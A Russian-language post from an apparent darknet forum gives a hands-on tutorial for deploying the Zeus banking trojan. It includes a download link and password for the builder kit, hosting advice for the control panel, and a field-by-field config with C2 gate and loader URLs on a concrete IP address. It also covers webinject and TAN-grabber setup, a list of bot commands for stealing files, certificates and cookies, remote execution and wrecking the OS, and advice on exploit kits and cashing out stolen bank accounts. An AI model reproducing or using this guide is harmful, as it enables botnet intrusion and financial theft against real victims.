Перейти к публикации
  • Гавань Пиратов!

    Добро пожаловать в DarkNet! Вы на теневом ресурсе - Гавань Пиратов!

    Чтобы стать участником форума вы должны "Зарегистрироваться", после этого вы сможете писать пользователям в Личные сообщения.

    Для новичков введена "предмодерация" перед публикацией "Тем" и "Cообщений" в темах. Подробнее

    А также, если вы впервые находитесь в DarkNet, вам полезно изучить "Сленг" и "Вопросы и ответы" Подробнее

Akwa

немного о Зевсе

Рекомендованные сообщения

В этой статье я расскажу как настроить и привести в проф пригодность такой инструмент как zeus. Трой очень популярный и довольно таки задроченный, но с него проще всего начать да и при наличии желания и прямых рух на нем можно не плохо заработать. (статья намбер 500 о нем, но еще раз изобрету велосипед)Пишу в первый раз так что не пинайте сильно))

 

И так, качаем архив: hXXp://www.sendspace.com/file/0s97o7

Пароль: csu

(1.2.10.1 - наиболее стабильная из паблик версий)

Здесь находится билд, конфиг, инжекты и админка.

 

Начнем с админки.

 

Вам нужно выбрать хост, не думаю что стоит сразу брать абузный за 150-300 баксов в месяц, если не занимаетесь этим всерьез.

Из фришных подходит 000webhost.com. Из недорогих платных посоветую Jino.ru. Сам тестил на нем, держался довольно долго, больше 2х недель, с онлайном 500-1000.

 

Заливаем админку. После чего создаем папку "_reports" в папке с админкой и ставим на нее права 777. Так же ставим 777 на папку system.

Далее переходим на "http://ваш_сайт/install", где появятся параметры установки. Тут все интуитивно понятно, кроме encryption_key. Это код для шифровки передачи данных между ботом и гейтом. Пишем от балды.

 

Установили.

 

Переходим к конфигу. В папке с билдером есть файл config.txt. Открываем. смотрим:

 

 

botnet "btn1"

- Имя вашего ботнета, может быть любое

 

timer_config 90 5

"90" - время, через которое ваш бот будет будет скачивать новый конфиг. "5" - через какое время будет скачивать если первая попытка не удалась.

 

timer_logs 40 5

"40" - время через которое ваш бот будет слать логи. "5" - если в первый раз не удалось.

 

url_config "http://sait.com/config.bin"

- путь до конфига вашего бота.

 

url_compip "http://myip.ru/get_ip.php"

- пусть на сайт, который сообщит айпи жертвы

 

encryption_key "123"

- тот самый ключ который мы вписывали при установке. Ключ в конфиге и админке должен совпадать.

 

blacklist_languages 1049

- здесь мы перечисляем коды языков тех стран, отчеты с которых мы не хотели бы получать

 

url_loader "http://77.78.239.141/bot.exe"

- путь до нашего бота

 

url_server "http://77.78.239.141/gate.php"

- путь к гейту

 

file_webinjects "webinjects.txt"

- файл с инжектами, должен находиться в папке с билдером

 

 

entry "AdvancedConfigs"

"http://sait2.com/config.bin"

- резервный путь к конфигу (на случай если ваш хост умер)

 

entry "WebFilters"

- в этом разделе мы указываем сайты для которых мы бы хотели бы получать отчеты в обязательном порядке. Если наоборот не хотели, то впререди ставим "!"

например

 

"!http://vkontakte.ru/*"

если нужно чтобы по каждому щелчку левой кнопки мыши по этому сайту отправлялся скрин - ставим "@"

 

entry "WebFakes"

- используем для подмены веб адресов

пример:

 

"http://www.google.com" "http://www.yahoo.com" "GP" "" ""

- в данном случае при открытии сайта google будет открываться yahoo (у меня почему то никогда не работало

 

 

entry "TANGrabber"

- грабит тан коды. Под ваши нужды пишем свои или заказываем у кодеров.

 

entry "DnsMap"

- прописываем строки которые нужно добавить в hosts (работает некорректно если больше 1 строки)

Пример:

 

127.0.0.1 microsoft.com

Закончили.

Запускаем билдер.

Жмем build config. сохраняем. Жмем build loader, сохраняем. Заливаем config.bin и bot.exe на хост.

Готово!

Скачиваем на виртуалку. Запускаем. Заходим в админку по адресу www.sait.com/cp.php

Бот должен появиться онлайн.

Если не появился - перепроверяем настройки. Так же не забываем ставить права 777 на config.bin.

 

Отчеты просматриваем, нажав Search in database и указав нужные нам параметры. В Scripts мы можем задавать комманды ботам. Вот список этих команд

 

 

lexec "C:\windows\system32\calc.exe" - откроет калькулятор на текущем пользователе(можно любую прогу запустить, калькулятор как пример)

resetgrab - повторное очищение кукисов, протектедсторедж

getmff - получить солфайлы с ботов

delmff - очистить солфайлы

getcert - получить сертификаты всех хранилишь

addsff "*.doc" - получить все док файлы бота

getfile "kkk.doc" - получить файл с бота

block_fake [url-маска] - блокирует вызов любого URL-редиректа, URL-маска которого будет подходить под URL-маска этой команды.

unblock_fake [маска] - из списка заблокированных URL-редиректов будут удалены все URL-маски, которые будут подходить под URL-маску этой команды.

block_url - блокирует вызов любой URL, которая будет совпадать с URL-маской этой команды.

unblock_url - из списка заблокированных URL будут удалены все URL-маски, которые

будут подходить под URL-маску этой команды.

rexec загрузка с заменой бота и запуск

rexeci загрузка с заменой бота перезагрузка и запуск

lexec загрузка и запуск

lexeci загрузка перезагрузка и запуск

addsf рестарт бота

delsf самоудаление

getfile скачать файл с машины бота

upcfg - после получения команды, бот немедленно попытается скачать файл конфигурации по стандартной URL.

kos - выводит из строя OS, а именно затирает ветки

Выбираем Add new Scripts, команды пишем в context. Если команду нужно выполнить на всех ботах - не заполняем ничего кроме context. Если у определенных - пишем их имена в List of bots. Ставим лимит отправки, жмем Create. Команды выполняются не сразу, а после очередного обращения к гейту.

 

 

А вот теперь о том зачем он вам нужен и стоит ли с ним работать. Несколько вариантов, выберите свой: )

 

 

Ну может ты получишь от этого моральное удовлетворение, так что вперед ))

 

Советую, не стоит. Потратишь все - не получишь ничего. Шанс что к тебе придет банк акк с 100500 баксами и ты сможешь его обналить - 1 из "эта самая сумма"

 

Как и во втором случае, не лучший вариант вложения. Да тебе уже хватит денег на начальный трафик и на абуз хост. Но для того чтобы ты не работал в минус, нужна хорошая связка, пробив не меньше 15%. Да ты можешь использовать паблик связки и будешь огорчен увидев пробив в 3-5%. И теперь посчитаем: 1000 уников - 30 ботов, вернее 15, так как существуют патчи от мс, проактивка, програмный конфликт и т.д. То есть вложишь 3 сотни баксов на 20к трафа, мы имеем 600 ботов. Есть шанс что они окупятся, но очень не большой. Так же нужно каждый день криптовать бота, это 15 баксов в в день минус. Лучший вариант - связка в аренду + покупка шеллов.

 

Да, тут уже можно отнестись к зевсу более серьезно и поставить эту лошадку на поток. Первое что будет нужно - арендовать связку за пару сотен баксов. Инжектами пока стоит пользоваться пабликовскими, как определиться узкий круг банков, платежек и т.п. - закажешь необходимые. В идеале - автообналы.

Скорее всего даже если просто продавать акки с логов - ты будешь окупать затраты на трафик.

 

Не плохой вариант. Фри хост, пабл связка и ковыряние логов принесет свои золотые пирамиды)

 

Многие говорят что для начала работы с ботнетом нужно 10-30 килобаксов. Это просто понты) Для начала нужно просто желание и сравнительно небольшие вложения. Как говориться, в умелых руках и *уй балалайка.

 

© v1skas

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×